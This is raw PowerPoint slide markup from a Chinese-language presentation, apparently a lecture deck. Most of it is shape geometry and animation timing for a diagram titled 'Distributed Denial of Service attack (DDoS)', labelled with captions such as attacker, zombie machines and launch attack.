                <a:gd name="T43" fmla="*/ 4 h 1217"/>
                <a:gd name="T44" fmla="*/ 11 w 2930"/>
                <a:gd name="T45" fmla="*/ 4 h 1217"/>
                <a:gd name="T46" fmla="*/ 11 w 2930"/>
                <a:gd name="T47" fmla="*/ 5 h 1217"/>
                <a:gd name="T48" fmla="*/ 11 w 2930"/>
                <a:gd name="T49" fmla="*/ 4 h 1217"/>
                <a:gd name="T50" fmla="*/ 12 w 2930"/>
                <a:gd name="T51" fmla="*/ 4 h 1217"/>
                <a:gd name="T52" fmla="*/ 11 w 2930"/>
                <a:gd name="T53" fmla="*/ 3 h 1217"/>
                <a:gd name="T54" fmla="*/ 11 w 2930"/>
                <a:gd name="T55" fmla="*/ 3 h 1217"/>
                <a:gd name="T56" fmla="*/ 11 w 2930"/>
                <a:gd name="T57" fmla="*/ 3 h 1217"/>
                <a:gd name="T58" fmla="*/ 10 w 2930"/>
                <a:gd name="T59" fmla="*/ 2 h 1217"/>
                <a:gd name="T60" fmla="*/ 9 w 2930"/>
                <a:gd name="T61" fmla="*/ 1 h 1217"/>
                <a:gd name="T62" fmla="*/ 8 w 2930"/>
                <a:gd name="T63" fmla="*/ 0 h 1217"/>
                <a:gd name="T64" fmla="*/ 6 w 2930"/>
                <a:gd name="T65" fmla="*/ 1 h 1217"/>
                <a:gd name="T66" fmla="*/ 4 w 2930"/>
                <a:gd name="T67" fmla="*/ 1 h 1217"/>
                <a:gd name="T68" fmla="*/ 2 w 2930"/>
                <a:gd name="T69" fmla="*/ 0 h 1217"/>
                <a:gd name="T70" fmla="*/ 1 w 2930"/>
                <a:gd name="T71" fmla="*/ 0 h 1217"/>
                <a:gd name="T72" fmla="*/ 0 w 2930"/>
                <a:gd name="T73" fmla="*/ 1 h 1217"/>
                <a:gd name="T74" fmla="*/ 0 w 2930"/>
                <a:gd name="T75" fmla="*/ 1 h 1217"/>
                <a:gd name="T76" fmla="*/ 1 w 2930"/>
                <a:gd name="T77" fmla="*/ 1 h 1217"/>
                <a:gd name="T78" fmla="*/ 0 w 2930"/>
                <a:gd name="T79" fmla="*/ 2 h 1217"/>
                <a:gd name="T80" fmla="*/ 0 w 2930"/>
                <a:gd name="T81" fmla="*/ 2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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1115" name="Freeform 88"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="607" y="2835"/>
              <a:ext cx="162" cy="115"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 486"/>
                <a:gd name="T1" fmla="*/ 1 h 344"/>
                <a:gd name="T2" fmla="*/ 1 w 486"/>
                <a:gd name="T3" fmla="*/ 1 h 344"/>
                <a:gd name="T4" fmla="*/ 0 w 486"/>
                <a:gd name="T5" fmla="*/ 1 h 344"/>
                <a:gd name="T6" fmla="*/ 0 w 486"/>
                <a:gd name="T7" fmla="*/ 1 h 344"/>
                <a:gd name="T8" fmla="*/ 0 w 486"/>
                <a:gd name="T9" fmla="*/ 0 h 344"/>
                <a:gd name="T10" fmla="*/ 1 w 486"/>
                <a:gd name="T11" fmla="*/ 0 h 344"/>
                <a:gd name="T12" fmla="*/ 2 w 486"/>
                <a:gd name="T13" fmla="*/ 0 h 344"/>
                <a:gd name="T14" fmla="*/ 2 w 486"/>
                <a:gd name="T15" fmla="*/ 0 h 344"/>
                <a:gd name="T16" fmla="*/ 2 w 486"/>
                <a:gd name="T17" fmla="*/ 0 h 344"/>
                <a:gd name="T18" fmla="*/ 2 w 486"/>
                <a:gd name="T19" fmla="*/ 1 h 344"/>
                <a:gd name="T20" fmla="*/ 2 w 486"/>
                <a:gd name="T21" fmla="*/ 0 h 344"/>
                <a:gd name="T22" fmla="*/ 1 w 486"/>
                <a:gd name="T23" fmla="*/ 0 h 344"/>
                <a:gd name="T24" fmla="*/ 0 w 486"/>
                <a:gd name="T25" fmla="*/ 1 h 344"/>
                <a:gd name="T26" fmla="*/ 0 w 486"/>
                <a:gd name="T27" fmla="*/ 1 h 344"/>
                <a:gd name="T28" fmla="*/ 1 w 486"/>
                <a:gd name="T29" fmla="*/ 1 h 344"/>
                <a:gd name="T30" fmla="*/ 1 w 486"/>
                <a:gd name="T31" fmla="*/ 1 h 344"/>
                <a:gd name="T32" fmla="*/ 1 w 486"/>
                <a:gd name="T33" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1116" name="Freeform 89"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="642" y="2878"/>
              <a:ext cx="58" cy="42"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 173"/>
                <a:gd name="T1" fmla="*/ 0 h 125"/>
                <a:gd name="T2" fmla="*/ 0 w 173"/>
                <a:gd name="T3" fmla="*/ 0 h 125"/>
                <a:gd name="T4" fmla="*/ 1 w 173"/>
                <a:gd name="T5" fmla="*/ 0 h 125"/>
                <a:gd name="T6" fmla="*/ 1 w 173"/>
                <a:gd name="T7" fmla="*/ 0 h 125"/>
                <a:gd name="T8" fmla="*/ 0 w 173"/>
                <a:gd name="T9" fmla="*/ 1 h 125"/>
                <a:gd name="T10" fmla="*/ 0 w 173"/>
                <a:gd name="T11" fmla="*/ 0 h 125"/>
                <a:gd name="T12" fmla="*/ 0 w 173"/>
                <a:gd name="T13" fmla="*/ 0 h 125"/>
                <a:gd name="T14" fmla="*/ 0 w 173"/>
                <a:gd name="T15" fmla="*/ 0 h 125"/>
                <a:gd name="T16" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="椭圆 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3500438" y="1500188"/>
            <a:ext cx="2571750" cy="53578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2" name="TextBox 92"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4286250" y="6000750"/>
            <a:ext cx="1143000" cy="461963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>傀儡</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18214982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144"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38914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89131"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(in)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389131"/>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389137"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(out)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389137"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="16" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="17" presetID="4" presetClass="entr" presetSubtype="32" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389141"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(out)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38914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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="4" presetClass="entr" presetSubtype="32" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389139"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(out)">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389139"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="29" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="30" presetID="4" presetClass="entr" presetSubtype="32" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389138"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(out)">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389138"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="33" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="34" presetID="4" presetClass="entr" presetSubtype="32" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(out)">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389140"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="37" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="38" presetID="4" presetClass="entr" presetSubtype="32" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389142"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(out)">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389142"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="41" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="42" presetID="15" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389133"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389133"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389133"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389133"/>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89133"/>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3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetID="4" presetClass="entr" presetSubtype="32" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389143"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(out)">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389143"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="52" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="53" presetID="15" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389134"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389134"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389134"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389134"/>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89134"/>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5000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="60" presetID="15" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389135"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389135"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389135"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389135"/>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389135"/>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6000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="67" presetID="15" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389136"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389136"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389136"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389136"/>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3891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1" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="389137" grpId="0" animBg="1"/>
      <p:bldP spid="389138" grpId="0" animBg="1"/>
      <p:bldP spid="389139" grpId="0" animBg="1"/>
      <p:bldP spid="389140" grpId="0" animBg="1"/>
      <p:bldP spid="389141" grpId="0" animBg="1"/>
      <p:bldP spid="389142" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="389143" grpId="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887112C-F3F0-47E2-B9D5-6B44E4EC68E2}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>182</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分布式拒绝服务攻击(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DDoS)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387170" name="PPBand283"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="179388" y="2781300"/>
            <a:ext cx="1573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solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>发起攻击</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="179388" y="3505200"/>
            <a:ext cx="1268412" cy="1223963"/>
            <a:chOff x="179512" y="3505200"/>
            <a:chExt cx="1268288" cy="1223665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37992" name="Picture 90" descr="desktopp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505200"/>
              <a:ext cx="692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3" name="PPBand281"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="179512" y="4267200"/>
              <a:ext cx="1268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en-US" sz="2400" b="1"/>
                <a:t>攻击者</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
